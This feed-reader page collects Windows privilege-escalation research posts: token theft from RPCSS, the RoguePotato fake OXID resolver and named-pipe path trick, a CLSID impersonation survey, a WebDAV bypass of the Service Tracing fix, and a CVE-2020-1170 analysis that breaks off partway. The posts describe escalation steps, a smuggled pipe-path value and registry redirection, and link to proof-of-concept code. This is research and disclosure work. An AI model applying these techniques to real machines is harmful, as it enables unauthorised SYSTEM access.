Reading view

There are new articles available, click to refresh the page.

From NETWORK SERVICE to SYSTEM

In the last period, there have been several researches on how to escalate privileges by abusing generic impersonation privileges usually assigned to SERVICE accounts.

Needless to say,  a SERVICE account is required in order to abuse the privileges.

The last one, in order of time, “Printer Spoofer” is probably the most dangerous/useful because it only relies on the “Spooler” service which is enabled by default on all Windows versions.

In Windows 10 and Windows Server where WinRM is not enabled, you can use our “Rogue WinRM listener” in order  to capture a SYSTEM token.

And of course, in Windows Server versions 2016 and Windows 10 up to 1803, our Rotten/Juicy Potato is still kicking!

In this post I’m going to show you how it is possible to get SYSTEM privileges from the Network Service account, as described in Forshaw’s post “Sharing a Logon Session a Little Too Much“. I suggest you to read it before if not already done as I won’t detail the internal mechanism.

In short, if you can trick the “Network Service” account to write to a  named pipe over the “network” and are able to impersonate the pipe, you can access the tokens stored in RPCSS service (which is running as Network Service and contains a pile of treasures) and “steal” a SYSTEM token. This is possible because of some “weird” cheks/ assignments  in token’s Authentication ID.  The token of the caller (coming from RPCSS service) will have assigned the Authentication ID of the  service and if you impersonate this  token you will have complete access to RPCSS process, including his tokens. (because the impersonated  token belongs to group “NT Service\RpcSs “)

Side note: here you can find some other “strange” behaviors based on AuthID.

Given that the local loopback interface (127.0.0.1) is considered a network logon/access, it’s possible to exploit this (mis)behavior locally with an all-in-one tool.

The easiest way is a compromised “Network Service” account with a shell access and this will be our starting point. In this situation, we can directly write via the loopback interface to the named pipe, impersonate and access RPCSS process tokens.

Note: For testing purpose, you can impersonate the “Network Service” account using psexec from an admin shell:

  • psexec64 -i -u “NT AUTHORITY\Network Service” cmd.exe

There are many ways to accomplish this task, for example with Forshaw’s NTOBJECTMANAGER library in Powershell (keep in mind that the latest MS Defender updates marks this library as malicious!??)

But my goal was to create a standalone executable in old plain vanilla style and given that I’m very lazy, I found most of the functions needed in the old but always good incognito2 project. The source code is very useful and educational, it’s worth the study.

I reused the most relevant parts of code and did some minor changes in order to adpapt it to my needings and also to evade AV’s.

Basically this is what it does:

  • start a Named Pipe Server listening on a “random” pipe
  • start a Pipe Client thread, connect to  the random pipe via “localhost” and write some data
  • In the pipe server, once the client connects, impersonate the client (coming from “RPCSS”)
  • List tokens of all processes:Capture
  • If a SYSTEM token is available , impersonate it  and execute your shell or whatever you prefer:

Cattura

 

The “adapted” source code for my POC can be found here: https://github.com/decoder-it/NetworkServiceExploit

That’s all 😉

 

Capture

decoderblogblog

Capture

Cattura

No more JuicyPotato? Old story, welcome RoguePotato!

 

After the hype we (@splinter_code and me) created with our recent tweet , it’s time to reveal what we exactly did in order to get our loved JuicyPotato kicking again… (don’t expect something disruptive 😉 )

We won’t explain how the *potato exploits works, how it was fixed etc etc, there is so much literature about this and google is always your best friend!

Our starting point will be the “RogueWiRM” exploit.

In fact, we were trying to bypass the OXID resolver restrictions when we came across this strange behavior of BITS. But what was our original idea?

“(…) we found a solution by doing some redirection and implementing our own “Oxid Resolver” . The good news is that yes, we got a SYSTEM token! The bad one: it was only an identification token, really useless

Short recap

  • You try to initialize a DCOM object identified by a particular CLSID from an “IStorage Object” via standard marshalling (OBJREF_STANDARD)
  • The “IStorage” obect contains, among other things, the OXID, OID, and IPID parameters needed for the OXID resolution in order to get the needed bindings to connect to our DCOM object interfaces. Think about it like sort of DNS query
  • From “Inside COM+: Base Services”: The OXID Resolver is a service that runs on every machine that supports COM+. It performs two important duties:
    • It stores the RPC string bindings that are necessary to connect with remote objects and provides them to local clients.
    • It sends ping messages to remote objects for which the local machine has clients and receives ping messages for objects running on the local machine. This aspect of the OXID Resolver supports the COM+ garbage collection mechanism.
  • OXID resolver is part of “rpcss” service and runs on port 135. Starting from Windows 10 1809 & Windows Server 2019, its no more possible to query the OXID resolver on a port different than 135
  • OXID resolutions are normally authenticated.  We are only interested in the authentication part, which occurs via NTLM in order to steal the token, so we can specify in our case for OXID, OID and IPID just 32 random bytes.
  • If you specify a remote OXID resolver, the request will be processed with an “ANONYMOUS LOGON“.

So what was our idea in our previous experiments?

  • Instruct the DCOM server to perform a remote OXID query by specifying a remote IP in the binding strings instead of “127.0.0.1”. This is done in the “stringbinding” structure
  • On the remote IP where is running a machine under our control, setup a “socat” listener (or whatever you prefer) for redirecting the OXID resolutions requests to a “fake” OXID RPC Server, created by us and  listening on a port different from 135. The fake server can run on the same Windows machine we are trying to exploit, but not necessary.
  • The fake OXID RPC server implements the “ResolveOxid2” server procedure
  • This function will resolve the client (ANONYMOUS LOGON) query  by returning the  RPC bindings which will point to another “fake” RPC server listening on a dedicated port under our control hosted on the victim machine.
  • The DCOM server will connect to the RPC server in order to perform the IRemUnkown2 interface call. By connecting tho the second RPC Server, an “Autentication Callback” is triggered and if we have SE_IMPERSONATE_NAME privileges, we can impersonate the caller via RpcImpersonateClient() call
  • And yes, it worked! We got a SYSTEM token coming from BITS service in this case, but unfortunately it was an Identification token, really useless.

The good news

So we abandoned the research until some days ago, when two interesting exploits/bugs had been published:

  1. Sharing a Logon Session a Little Too Much published by @tiraniddo . You can also find in this blog  the  post along with a working POC in order to demonstrate how it was possible for the NETWORK SERVICE Account to elevate privileges (bug/feature?)
  2. The marvellous “Print Spoofer” exploit published by @itm4n. In this case (and for our scenario) not for the exploit itself but for the “bug” in the named pipe path validation checks.

On a late evening of some days ago, @splinter_code sent me a message:

(@splinter_code) “If we resolve the fake OXID request by providing an RPC binding with  our named pipe instead of the TCP/IP sequence, we should in theory be able to impersonate the NETWORK SERVICE Account and after that… SYSTEM is just a step beyond…”

(me) “Yeah, sounds good, let’s give it a try!”

And guess what? IT WORKED!!!

Let’s dig into the details.

The “fake” OXID Resolver

First of all a  little bit of context on how the OXID resolution works is required to understand the whole picture.
This is how the flow looks like, taken from msdn :

OXID resolution sequence

The client will be the RPCSS service that will try to connect to our rogue oxid resolver (server) in order to locate the binding information to connect to the specified dcom.

Consider that all the above requests done by the client in the OXID resolution sequence are authenticated (RPC Security Callback) impersonating the user running the COM behind the CLSID we choose (usually the one running as SYSTEM are of interests).
What *potato exploits does is intercepting this authentication and steal the token (well technically is a little bit more complicated because the authentication is forwarded to the local system OXID resolver that will do the real authentication and *potato will just alter some packets to steal the token… a classic MITM attack).
When this is done over the network (due to the MS fix) this will be an Anonymous Logon so quite useless for an EoP scenario.

Our initial idea was to exploit one of the OXID resolver (technically called IObjectExporter) method and forge a response that could trigger a privileged authentication to our controlled listener.

Looking at the scheme above 2 functions caught our attention:

So the first request was not of our interest because we couldn’t  specify endpoint information (that’s what we needed) so we were always answering with a response of RPC_S_OK. This is an example of what a standard response looks like:

serveralive2_pcap

So we focused in the next one (ResolveOxid2) and what we saw is something interesting that we could abuse:

resolveoxid2_pcap

Observing the above traffic, that is a standard response captured on the real OXID resolver on a windows machine, we quickly spot that we could abuse this call by forging our own ResolveOxid2 response and specify as an endpoint our controlled listener.
We can  specify endpoint information in the format ipaddress[endpoint] and also the TowerId (more on that later).

But… Why not registering the binding information we require on the system OXID resolver, getting the OID and OXID from the system and ask the unmarshalling of that?
Well as our knowledge the only way to do that is by registering a CLSID on the system and to do that you need Administrator privileges.

So our idea was to implement a whole OXID resolver that would answer always with our listener binding for any oxid oid it will receive, just a Fake OXID resolver.

Let’s analyze the function ResolveOxid2 to understand how to forge our response:

[idempotent] error_status_t ResolveOxid2(
   [in] handle_t hRpc,
   [in] OXID* pOxid,
   [in] unsigned short cRequestedProtseqs,
   [in, ref, size_is(cRequestedProtseqs)] 
     unsigned short arRequestedProtseqs[],
   [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
   [out, ref] IPID* pipidRemUnknown,
   [out, ref] DWORD* pAuthnHint,
   [out, ref] COMVERSION* pComVersion
 );

What we need to do is to fill the DUALSTRINGARRAY ppdsaOxidBindings with our controlled listener.
Well that was a little bit tricky, but it is well documented by MS (in 1 and 2) so it was just a matter of trial and errors to forge the right offsets/sizes for the packet.

Let’s recap, we can redirect the client to our controlled endpoint (aNetworkAddr) and we can choose the protocol sequence identifier constant that identifies the protocol to be used in RPC calls (wTowerId).

There are multiple protocols supported by RPC (here a list).

In the first attempt we tried ncacn_ip_tcp, as TowerId, that allows RPC straight over TCP.
We run an RPC server (keep in mind that a “standard” user can setup and register an RPC Server) with the IRemUnknown2 interface and tried to authenticate the request in our SecurityCallback calling RpcImpersonateClient.
Returning ncacn_ip_tcp:localhost[9998] in the ResolveOxid2 response, an authentication to our RPC server (IRemUnknown2) were triggered, but unfortunately was just an identification token…

iremunkown2

 

So that was a dead end… But what about “Connection-oriented named pipesncacn_np ?

The named pipe Endpoint mapper

First of all what is the “epmapper” ? Well it’s related to the “RpcEptMapper” service. This service resolves “RPC interfaces identifiers to transport endpoints”.  Same concept as OXID Resolver, but for RPC.

The mapper runs also on TCP port 135 but can also be queried via a special named pipe “epmapper”.

This service shares the same process space as the “rpcss” service and both of them run under the NETWORK SERVICE account.  So if we are able to impersonate the account under this process we can steal the SYSTEM token (because this process hosts juicy tokens)…

The first try we gave was to return a named pipe under our control in the ResolveOxid2 response:

ncacn_np:localhost[\pipe\roguepotato]

But observing the network traffic the RPCSS still connected to the \pipe\epmapper . This is because, by protocol design, the named pipe epmapper must be used, and this is obviously a “reserved” name:

Capture

No way…

When we read the PrintSpoofer post we were impressed by clever trick of the named pipe validation path bypass (credits to @itm4n and @jonasLyk) where inserting ‘/’ in the hostname will be converted in partial path of the named pipe!

With that in mind we returned the following binding information:

ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]

And you know what? The RPCSS were trying to connect to nonexistent named pipe \roguepotato\pipe\epmapper :

named_pipe_not_found

Great! So we setup a pipe listener on \\.\pipe\roguepotato\pipe\epmapper, got the connection and impersonated the client. Then we inspected the token with TokenViewer :

token_viewer

So we had an Impersonation token of the NETWORK SERVICE account and also the LUID of the RPCSS service! 

Why that? Well, the answer was in the post mentioned above:

if you can trick the “Network Service” account to write to a  named pipe over the “network” and are able to impersonate the pipe, you can access the tokens stored in RPCSS service

All the “magic” about the fake ResolveOxid2 response is happening in this piece of code:

resolveoxid2

The Token “Kidnapper”

Perfect! Now we just needed to perform the old and well known Token Kidnapping technique to steal some SYSTEM token from the RPCSS service.

We setup a minimalist “stealer” which performs the following operations:

  • get the PID of the “rpcss” service
  • open the process, list all handles and for each handle try to duplicate it and get the handle type
  • if handle type is “Token” and token owner is SYSTEM, try to impersonate and launch a process with CreatProcessAsUser() or CreateProcessWithToken()
  • In order to get rid of the occasional “Access Denied” when trying to launch a processes in Session 0, we also setup the correct permissions for the Windows Station/Desktop 

Well, let’s unleash RoguePotato and see our SYSTEM shell popping 😀

system_privs

Final Thoughts

Probably you are a little bit confused at this point, let’s do a recap. Under which circumstances can I use this exploit to get SYSTEM privileges?

  • You need a compromised account on the victim machine with Impersonate privileges (but this is the prerequisite for all these type of exploits). A common scenario is code execution on default IIS/MSSQL configuration.
  • If you are able to impersonate NETWORK SERVICE account or if the “spooler” service is not stopped you can first try the other exploits mentioned before…
  • You need to have  a machine under your control where you can perform the redirect and this machine must be accessible on port 135 by the victim  
  • We setup a POC with 2 exe files. In fact it is also possible to launch the fake OXID Resolver in standalone mode on a Windows machine  under our control when the victim’s firewall won’t accept incoming connections.
  • Extra mile: In fact, in the old *potato exploit, an alternate way for stealing the token was just to setup a local RPC listener on dedicated port instead of forging the local NTLM Authentication,  RpcImpersonateClient() would have done the rest.

To sum it up:

flow_graph_2

You can find the source code and POC of RoguePotato here.

Final note: We didn’t bother to report this “misbehavior?” to MS because they stated that elevating from a Local Service process (with SeImpersonate) to SYSTEM is an “expected behavior”. (RogueWinRm – Disclosure Timeline)

That’ all 😉

@slpinter_code, @decoder_it

Capture

decoderblogblog

OXID resolution sequence

serveralive2_pcap

resolveoxid2_pcap

iremunkown2

Capture

named_pipe_not_found

token_viewer

resolveoxid2

system_privs

flow_graph_2

The impersonation game

I have to admit, I really love Windows impersonation tokens! So when it comes to the possibility to “steal” and/or impersonate a token I never give up!

This is also another chapter of the never ending story of my loved “JuicyPotato”.

 So, here we are (refer to my previous posts in order to understand how we arrived a this point):

  • You cannot specify a custom port for OXID resolver address in latest Windows versions
  • If you redirect the OXID resolution requests to a remote server on port 135 under your control and the forward the request to your local Fake RPC server, you will obtain only an ANONYMOUS LOGON.
  • If you resolve the OXID Resolution request to a fake “RPC Server”, you will obtain an identification token during the IRemUnkown2 interface query.

The following image should hopefully describe the “big picture”

 

But why this identification token and not an impersonation one? And are we sure that we will always get only an identification token? We need at least an impersonation token in order to elevate our privileges!

But first of all we need to understand who/what is generating this behavior. A network capture of the NTLM authentication could help:  

The verdict is clear: in the first NTLM message, the client sets the “Identify” flag, which means that the server should not impersonate the client.

Side Note: Don’t even try to change this flag (remember, we are doing kind of MITM attack in local NTLM Authentication, so we could alter the value), the client would not answer to our NTLM type 2 message!

But why does the client activate this flag? Well, probably it’s all in this RPC API client call setup:

RPC_STATUS RpcBindingSetAuthInfoExA( 
RPC_BINDING_HANDLE Binding, 
RPC_CSTR ServerPrincName, 
unsigned long AuthnLevel, 
unsigned long AuthnSvc, 
RPC_AUTH_IDENTITY_HANDLE AuthIdentity, 
unsigned long AuthzSvc, 
RPC_SECURITY_QOS *SecurityQos 
);

More precisely in this structure:

typedef struct _RPC_SECURITY_QOS {
unsigned long Version; 
unsigned long Capabilities; 
unsigned long IdentityTracking; 
unsigned long ImpersonationType; 
} RPC_SECURITY_QOS, *PRPC_SECURITY_QOS;

The client can define the desidered impersonation level before connecting to server. At this point we can assume that this is the default:

ImpersonationType=RPC_C_IMP_LEVEL_IDENTIFY

for the COM security settings when svchost services starts the DLL inside svchost.exe.

This is also controlled in a registry key (thanks to @tiraniddo for remembering me this)  located in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost where the impersonation level can be defined overriding the default value.

In the following screen shot we can observe that all services belonging to “print” group will call the CoInitializeSecurity function with Impersonation level =3 (Impersonate)

And which service belongs to this group?

It’s the “PrintNotify” service, which can be instantiated and accessed by the following DCOM server:

Ok, let’s see what happens on a fully patchted Win10 1909 if we try to initialize this object via the IStorageTrigger, redirect to our fake OXID resolver and then intercept he authentication callbacks.

The first request with ANONYMOUS logon is relative to the redircted OXID resolution request. The two subsequent are generated by the IremUnknown2 queries, and this time we have impersonation tokens from SYSTEM!

And according to the registry configuration, we can see that the Impersonation parameter is read from the registry:

But wait, there is still another problem:

The SERVICE user’s group (which is typically the users we will “target” because they have impersonation privileges) cannot start/launch the sevice/dll and does not belong to the INTERACTIVE group.

Again, no way? Well not exactly.

With my modified JuicyPotato – juicy_2 (see previous screenshot) running as “NT AUTHORITY\Local Service”, I tested all CLISD’s (7268 in my Windows 10 1909) in order to find something else and this is the result:

There were 2 other CLSIDS which impersonate LOCAL SYSTEM:

  1. {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} which is hosted by the obsolete ActiveX Installer service:


This service belongs the “AxInstSVGroup” group, but surprisingly this group is not listed in the registry, so I would expect an Identification token! This means that the previous assumption is not always true, the impersonation level is not exclusively controlled via registry configuration…

2. {C41B1461-3F8C-4666-B512-6DF24DE566D1} This one does not belongs to a specific service but is related to an Intel Graphics Driver “IntelCpHeciSvc.exe” which hosts a DCOM server.




Clearly, the presence of this driver depends on the HW configuration of your machine.

The other CLISD’s impersonates the interactive user connected to first Session:

{354ff91b-5e49-4bdc-a8e6-1cb6c6877182 }- SpatialAudioLicenseServerInteractiveUser

{38e441fb-3d16-422f-8750-b2dacec5cefc}- ComponentPackageSupportServer

{f8842f8e-dafe-4b37-9d38-4e0714a61149} – CastServerInteractiveUser

So if you have impersonation privileges and an admin is connected interactively you could obtain his token and impersonate.

I did the same test on the CLSID’s of a Windows 2019 Server but this time was not able to get a SYSTEM impersonation token. The ActiveX Installer service is disabled by default on this OS. The only valid CLSID’s were the 3 relative to interactive user.

Well that’s all for now, the Impersonation game never ends 😉

.. and thanks to @splinter_code

Source code can be found here

Capture.PNG

decoderblogblog

Chimichurri Reloaded - Giving a Second Life to a 10-year old Windows Vulnerability

This is a kind of follow-up to my last post, in which I discussed a technique that can be used for elevating privileges to SYSTEM when you have impersonation capabilities. In the last part, I explained how this type of vulnerability could be fixed and I even illustrated it with a concrete example of a workaround that was implemented by Microsoft 10 years ago in the context of the Service Tracing feature. Though, I also insinuated that this security measure could be bypassed. So, let’s see how we can make a 10-year old vulnerability great again…

What Are We Talking About?

I won’t assume that you’ve read all of my previous blog posts, so I’ll start things off with a brief recap.

Around 10 years ago, Cesar Cerrudo (@cesarcer) found that it was possible to use the Service Tracing feature of Windows as a way of capturing a SYSTEM token using a named pipe. As long as you had the SeImpersonatePrivilege privilege, you could then execute arbitrary code in the security context of this user. Back then, this was acknowledged by Microsoft as a vulnerability and it got the CVE ID CVE-2010-2554.

Let’s take the Service Tracing key corresponding to the RASMAN service as an example. The idea is simple, you first have to start a local named pipe server. Then, instead of setting a simple directory path as the target log file’s folder in the registry, you can specify the path of this named pipe.

In this example, \\localhost\pipe\tracing is set as the target directory. Then, as soon as EnableFileTracing is set to 1, the service will try to open its log file using the path \\localhost\pipe\tracing\RASMAN.LOG. So, if we create a named pipe with the name \\.\pipe\tracing\RASMAN.LOG, we will receive a connection and we can impersonate the service account by calling the ImpersonateNamedPipeClient function. Since RASMAN is running as NT AUTHORITY\SYSTEM, we eventually get a SYSTEM impersonation token.

Note: depending on the version of Windows, the log file open event sometimes doesn’t occur immediately when EnableFileTracing is set to 1. One way to trigger it reliably is to start the service. Note that the RASMAN service can be started by low-privileged users via the Service Control Manager (SCM).

Of course, if you try to do this on a version of Windows that is less than 10 years old, you’ll run into the same problem that is shown on the above screenshot. If you try to execute arbitrary code in the security context of the impersonated user, you’ll get the error code 1346, i.e. Either a required impersonation level was not provided, or the provided impersonation level is invalid.. You could also get the error code 5, i.e. Access denied. It’s the result of a counter-measure that was enforced by Microsoft in this particular Windows feature.

I detailed this security update in my previous post. To put it simple, the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are now specified in the CreateFile function call, which is responsible for getting the initial handle on the target log file. Because of these flags, the resulting impersonation level of the token we get is now SecurityIdentification (level 2/4). Though, SecurityImpersonation (level 3/4) or SecurityDelegation (level 4/4) is required in order to fully impersonate the user.

Note: as a side note, you probably noticed that the message Unknown error 0x80070542 is printed on the command prompt instead of the actual Win32 error message. The reason for this is that I try to get the error message correspondnig to the error code while impersonating the user. Because of the limited impersonation level, this code/message lookup fails.

Does it mean we are screwed? Short answer, yes, we are because the token we get is kinda useless. Long answer, well, you’ll have to read the next parts… :wink:

A UNC Path?

In the previous part, we saw that if we specify the name of a pipe as the log file directory, we do get an impersonation token but we cannot use it to create a new process. OK but did you notice how I glossed over an important detail here? How did I specify the name of a pipe in the first place?

First you need to know how the final log file path is calculated. That’s trivial, it’s a simple string concatenation: <DIRECTORY>\<SERVICE_NAME>.LOG, where <DIRECTORY> is read from the registry (FileDirectory value). So, if you specify C:\Temp as the output directory for a service called Bar, the service will use C:\Temp\BAR.LOG as the path of its log file.

In this exploit though, we specified the name of a pipe rather than a regular directory, by using a UNC path. On Windows, there are many ways to specify a path and this is only one of them but this post isn’t about that. Actually, UNC (Universal Naming Convention) is exactly what we need, but we need to use it a slightly differently.

UNC paths are commonly used for accessing remote shares on a local network. For example, if you want to access the folder BAR on the volume FOO of the machine DUMMY, you’ll use the UNC path \\DUMMY\FOO\BAR. In this case, the client machine connects to the TCP port 445 of the target server and uses the SMB protocol to exchange data.

There is a slight variant of this example that you probably already know of. You can use a path such as \\DUMMY@4444\FOO\BAR in order to access a remote share on an arbitrary port (4444 in this example) rather than the default TCP port 445. Although the difference in the path is small, the implications are huge. The most obvious one is that the SMB protocol is no longer used. Instead, the client uses an extended version of the HTTP protocol, which is called WebDAV (Web Distributed Authoring and Versioning).

On Windows, WebDAV is handled by the WebClient service. If you check the description of this service, you can read the following:

Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these functions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

Although, WebDAV uses a completely different protocol, one thing remains: authentication. So, what if we create a local WebDAV server and use such a path as the output directory?

Hello, I’m Officer Dave. May I See Your ID, Please?

First things first, we need to edit the regsitry and change the value of FileDirectory. We will set \\127.0.0.1@4444\tracing instead of a named pipe path.

Thanks to netcat, we can easily open a socket and listen on the local TCP port 4444. After enabling the service tracing, here is what we get:

Interesting! We get an HTTP OPTIONS request. The User-Agent header also shows us that this is a WebDAV request but, apart from that, there’s not much to learn. Though, now that we know that the service is willing to communicate using WebDAV, we should reply and send an authentication request. :wink:

To do so, I created a simple PowerShell script that uses a System.Net.Sockets.TcpListener object to listen on an arbitrary port and send a hardcoded HTTP response to the first client that connects to the socket. Here is the content of the HTTP response we will send to the client:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: NTLM

If you are familiar with web application pentesting, there is a high chance you’ve encountered the WWW-Authenticate header with the value Basic quite a lot (e.g.: Apache htpasswd), but not necessarily NTLM. This value allows us to indicate that the client must authenticate using the 3-way NTLM authentication scheme. By the way, if you feel like you need to fill some gaps about NTLM, I highly recommend you to read this excellent post about NTLM relaying by @HackAndDo. These blog posts are always very well written. :slightly_smiling_face:

With the script running in the background, we get the following result:

At first glance, it looks like the service accepted to initiate the NTLM authentication and sent us its NTLM NEGOTIATE request. This is confirmed by the output of Wireshark.

This is a good start, we are definitely on the right track but there is one last thing to verify. This one last thing will decide whether all of this was for nothing or not: the Negotiate Identify flag.

The NTLM authentication protocol documentation is quite exhaustive. You can see the detailed structure of each message that is used in the protocol. In particular, this section explains how the NegotiateFlags value is calculated in the NEGOTIATE message. About the Identify flag, you can read:

So, if this bit is set, the client tells the server that it can request a token with an impersonation level of SecurityIdentification only. In other words, if this flag is set, we are back to square one. We won’t be able to get a proper impersonation token.

Thanks to the amazing Wireshark dissectors, we can easily check the value of this flag.

The Identify flag is not set!!! :tada:

This means that we can bypass the patch and get an impersonation token that we can use to execute arbitrary code in the context of NT AUTHORITY\SYSTEM. What we need to do next is simply complete the NTLM authentication thanks to an NTLM negotiator. This will allow us to transform this raw NTLM exchange into a token that we can then use if we have impersonation privileges. Though, I won’t talk about this here because this subject is already covered by the *Potato exploits.

The below screenshot shows the result of the PoC I implemented.

A Quick Bug Analysis

There is still some work to do in order to fully understand why this trick works. I won’t write a detailed analysis here but I’ll share some insight.

First, there is one detail that you may have noticed while reading the previous part. The service is requesting the resource /tracing rather than /tracing/RASMAN.LOG. Weird, isn’t it? :thinking:

Since we specified \\127.0.0.1@4444\tracing as the directory path, you’d expect that the service uses the path \\127.0.0.1@4444\tracing\RASMAN.LOG and therefore requests /tracing/RASMAN.LOG. Of course, there is an explanation. If you take a quick look at the code of the TraceCreateClientFile function in rtutils.dll, you’ll see that, before trying to open the log file, it begins by checking whether the directory specified in the FileDirectory value exists.

On the below screenshot, you can see that if CreateDirectory succeeds, i.e. if the target directory didn’t exist and was successfully created, then the function immediately returns. In this case, the log file is never opened and you’d have to disable the tracing and re-enable it. In other words, for the TraceCreateClientFile function to complete, this CreateDirectory call must fail.

The first HTTP request we receive on our WebDAV server is actually the result of this initial check. Moreover, CreateDirectory is nothing more than a user-friendly wrapper for the NtCreateFile function. Yes, everything is a file, even on Windows! :upside_down_face:

This CreateDirectory function is very convenient but there is a problem: it doesn’t allow you to specify custom flags, such as the ones used to restrict the impersonation level of the token. This explains why I was able to get a proper impersonation token using this trick.

BOOL CreateDirectoryW(
  LPCWSTR               lpPathName,
  LPSECURITY_ATTRIBUTES lpSecurityAttributes
);

Does it mean that I was lucky? What would happen if the server actually requested /tracing/RASMAN.LOG via the hardened CreateFile function call? To answer this question, I compiled the following code:

HANDLE hFile = CreateFile(
    argv[1], 
    GENERIC_READ | GENERIC_WRITE, 
    0, 
    NULL, 
    OPEN_EXISTING, 
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION, // <- Limited token
    NULL);
if (hFile)
{
    wprintf(L"CreateFile OK\n");
    CloseHandle(hFile);
}
else
{
    PrintLastErrorAsText(L"CreateFile");
}

Then, instead of waiting for the RASMAN service to connect, I manually triggered the WebDAV access using this dummy application as a low-privileged user. And… here is the result:

Although the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are specified in the CreateFile function call, we still get a token with the impersonation level SecurityImpersonation! As a conclusion, yes, I was a bit lucky but it’s not that simple as it turns out the WebClient service is also flawed.

Conclusion

In this post, I explained how it is possible to easily bypass a security patch that was originally implemented to prevent a malicious server application from getting a usable impersonation token by leveraging the Service Tracing feature. Though I have to give part of the credit to this MS16-075 exploit that was written by a colleague of mine a couple of years ago. It served as a great inspiration.

I don’t know yet if I’ll publish this as a tool or not. There is still some work to do in order to make it a usable tool because of the many Service Tracing keys that can be triggered. Moreover, there is still a major prerequisite for this trick to work: the WebClient service must be installed and enabled. Although this is the default on Workstations, it’s not the case for Servers. On a server, you would need to install/enable the WebDAV component as an additional feature.

Lastly, I didn’t take the time to push further the investigation. There is a lot more work to do in order to understand why the request that is coming from the WebClient service doesn’t take the SECURITY_IDENTIFICATION flag of the CreateFile call into consideration. In my opinion, this is a vulnerability but, who cares? :pensive:

Links & Resources

CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability

Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender. Finding a vulnerability in a security-oriented product is quite satisfying. Though, there was nothing groundbreaking. It’s quite the opposite actually and I’m surprised nobody else reported it before me.

Introduction

Before diving into the technical details of this vulnerability, I want to say a quick word about the timeline. I initially reported this vulnerability through the Zero Day Initiative (ZDI) program around 8 months ago. After sending them my report, I received a reply stating that they weren’t interested in purchasing this vulnerability. At the time, I had only a few weeks of experience in Windows security research so I kind of relied on their judgement and left this finding aside. I even completely forgot about it in the following months.

Five months later, in late March 2020, I eventually went through my notes again and saw this report but, this time, my mindset was different. I had gained some experience because of a few other reports that I had sent to Microsoft directly. So, I knew that it was potentially eligible and I decided to spend a bit more time on it. It was a good decision because I even found a better way of triggering the vulnerability. I reported it to Microsoft in early April and it was acknowledged a few weeks later.

The Initial Thought Process

In the advisory published by Microsoft, you can read:

An elevation of privilege vulnerability exists in Windows Defender that leads to arbitrary file deletion on the system.

As usual, the description is quite generic. You’ll see that there is more to it than just an “arbitrary file deletion”.

The issue I found is related to the way Windows Defender log files are handled. In case you don’t know, Windows Defender uses 2 log files - MpCmdRun.log and MpSigStub.log - which are both located in C:\Windows\Temp. This directory is the default temp folder of the SYSTEM account but that’s also a folder where every user has Write access.

Althouth that may sound bad, it isn’t that bad because the permissions of the files are properly set (obviously?). By default, Administrators and SYSTEM have Full Control over these files, whereas normal users can’t even read them.

Here is an extract from a sample log file. As you can see, it is used to log events such as Signature Updates, but you can also find some entries related to Antivirus scans.

Signatures updates are automatically done on a regular basis but they can also be triggered manually using the Update-MpSignature PowerShell command for example, which doesn’t require any particular privileges. Therefore, these updates can be triggered as a normal user, as shown on the screenshot below.

During the process, we can see that some information is being written to C:\Windows\Temp\MpCmdRun.log by Windows Defender (as NT AUTHORITY\SYSTEM).

What this means is that, as a low-privileged user, we can trigger a log file write operation by a process running as NT AUTHORITY\SYSTEM. Though we don’t have access to the file and we can’t control its content. We don’t even have Write access on the Temp folder itself so we wouldn’t be able to set it as a mount point either. I can’t think of a more useless attack vector right now. :laughing:

Though, following my experience with CVE-2020-0668 (again…) - A Trivial Privilege Escalation Bug in Windows Service Tracing - I knew that there was potentially more to it than just a log file write.

Think about it for a second, each time a Signature Update is done (which happens quite often), a new entry is added to the file, which represents around 1 KB. That’s not much, right? But how much would it represent after several months or even years? In such case, log rotation mechanisms are often implemented so that old logs are compressed, archived or simply deleted. So, I wondered if such mechanism was also implemented to handle the MpCmdRun.log file. If so, there is probably some place for a privileged file operation abuse…

Searching for a Log Rotation Mechanism

In order to find a potential log rotation mechanism, I began by reversing the MpCmdRun.exe executable itself. After opening the file in IDA, the very first thing I did was search for occurrences of the MpCmdRun string. My initial objective was to see how the log file was handled. Looking at the Strings window is usually a good way to start.

Not surprisingly, the first result was MpCmdRun.log. Though, another very interesting result came out of this search: MpCmdRun_MaxLogSize. I was looking for a log rotation mechanism and this string was clearly the equivalent of “Follow the white rabbit”. Obviously, I took the red pill and went down the rabbit hole. :sunglasses:

Looking at the Xrefs of MpCmdRun_MaxLogSize , I found that it was used in only one function: MpCommonConfigGetValue().

The MpCommonConfigGetValue() function itself is called from MpCommonConfigLookupDword().

Finally, MpCommonConfigLookupDword() is called from the CLogHandle::Flush() method.

The following part of CLogHandle::Flush() is particularly interesting because it’s responsible for writing to the log file.

First, we can see that GetFileSizeEx() is called on hObject (1), which is a handle pointing to the log file (MpCmdRun.log) at this point. The result of this function is returned in FileSize, which is a LARGE_INTEGER structure.

typedef union _LARGE_INTEGER {
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } DUMMYSTRUCTNAME;
  struct {
    DWORD LowPart;
    LONG  HighPart;
  } u;
  LONGLONG QuadPart;
} LARGE_INTEGER;

Since MpCmdRun.exe is a 64-bit executable here, QuadPart is used to get the file size as a LONGLONG directly. This value is stored in v11 and is then compared against the value returned by MpCommonConfigLookupDword() (2). If the file size is greater than this value, the PurgeLog() function is called.

So, before going any further, we need to get the value returned by MpCommonConfigLookupDword(). To do so, the easiest way I found was to put a breakpoint right after this function call and get the result from the RAX register.

Here is what it looks like once the breakpoint is hit:

Therefore, we now know that the maximum file size is 0x1000000, i.e. 16,777,216 bytes (16MB).

The next logical question would then be: what happens when the log file size exceeds this value? As we saw earlier, when the size of the log file exceeds 16MB, the PurgeLog() function is called. Based on the name, we may assume that we will probably find the answer to this second question inside this function.

When this function is called, a new filename is first prepared by concatenating the original filename and .bak. Then, the original file is moved, which means that MpCmdRun.log is renamed as MpCmdRun.log.bak. Now we have our answer: a log rotation mechanism is indeed implemented.

